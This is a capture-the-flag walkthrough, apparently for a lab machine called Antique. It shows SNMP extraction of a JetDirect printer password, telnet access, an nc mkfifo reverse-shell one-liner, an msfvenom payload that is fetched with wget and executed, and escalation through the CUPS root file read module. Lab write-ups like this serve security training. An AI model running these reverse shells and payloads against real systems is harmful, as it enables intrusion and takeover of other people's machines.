# Antique

## Nmap

```
sudo nmap 10.10.11.107 -p- -sS -sV

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
```

With minimal `nmap` results returned we also scan `UDP` ports for any open ports.

```
sudo nmap 10.10.11.107 -sU -F                     

PORT    STATE SERVICE
161/udp open  snmp
```

Checking out telnet on port 23 we see when connecting we are informed of a HP JetDirect printer.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu9mKKX5PU3fuf8poD4Qd%2Fimage.png?alt=media\&token=28830114-12fb-4a7e-a2ee-14813ef951c2)

A few default passwords prove unsuccessful. Researching on Google for JetDirect exploits we find a great article from IronGeek: <http://www.irongeek.com/i.php?page=security/networkprinterhacking>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FStkxF2ttxlJqOc5mwe1v%2Fimage.png?alt=media\&token=df22593a-7e3e-4aa5-af55-0ed2abd50ddc)

As per the article we try the same exploit.

```bash
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9d1UDx6tM4l6TMy9hq7f%2Fimage.png?alt=media\&token=b4306874-6c71-4411-bc16-dd89115f2b6f)

The resulting BITS value can be taken over to CyberChef and decoded from Hex to a plaintext value.

**CyberChef:** <https://gchq.github.io/CyberChef>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKNiI5RPsRBE7JxwVD1d9%2Fimage.png?alt=media\&token=463f9452-e015-4f6c-8ad7-cdb4badbf183)

We now have the password `P@ssw0rd@123!!123` which can be used to authenticate over `telnet`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9O07HzrvFmQREYjnh1ii%2Fimage.png?alt=media\&token=49654e36-7e7c-4beb-ac6b-96a9e41dfd14)

From the `?` output above we see the `exec` command can be used to perform system commands.

Running the following command shows `nc` is installed on the target system.

```
exec which nc
```

a `nc` listener is set up on the attacking system and the following command is executed on the target `telnet` session to receive a reverse shell.

```bash
exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <Port> >/tmp/f
```

Which we receive a shell on our `nc` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FL5BN5zmbvvrybcm2z5Qw%2Fimage.png?alt=media\&token=0a49b7c3-f3a3-4fba-bff6-6959511453ec)

After grabbing the user flag, we perform some basic enumeration against the target system. Looking through the CUPS configuration files we notice we are running CUPS 1.6.1

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FWfRl30V52bV33zfEmkJA%2Fimage.png?alt=media\&token=fec89006-7779-405e-baa6-b88fc062ad6b)

Research against Google shows this version of CUPS can perform root file reads.

**URL:** <https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/>

As this is a `metasploit` module we will need to get a `meterpreter` shell.

Firstly, an x86 `elf` payload was generated.

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f elf -o reverse.elf
```

A `meterpreter` listener was then setup

```bash
msfconsole -q -x "use multi/handler; set payload linux/x64/shell_reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"
```

The payload as then downloaded onto the target system and executed.

```
# Download the payload
wget http://<IP>/reverse.elf

# Set executable on the payload
chmod +x reverse.elf

# Execute
./reverse.elf
```

This will then catch a command shell within `meterpreter`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FrpreBAWVPmawNfazThy6%2Fimage.png?alt=media\&token=bf874a0f-40f5-4b94-ac9f-785da60ca52b)

After this the following `metasploit` mode was used to upgrade the command shell to a `meterpreter` shell.

```
use post/multi/manage/shell_to_meterpreter
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbZoykivE0HNfJPMDfKhP%2Fimage.png?alt=media\&token=173d468b-8325-44f9-8bbe-6f9fee96adae)

The following mode was then used for the CUPS root read module.

```
use post/multi/escalate/cups_root_file_read
```

The `root.txt` was set as a parameter for the file to read and executed. Successfully reading the `root.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVVYyLkk15VblGR6O1rmT%2Fimage.png?alt=media\&token=033a5c95-db75-4714-b7e2-c7e0c320d791)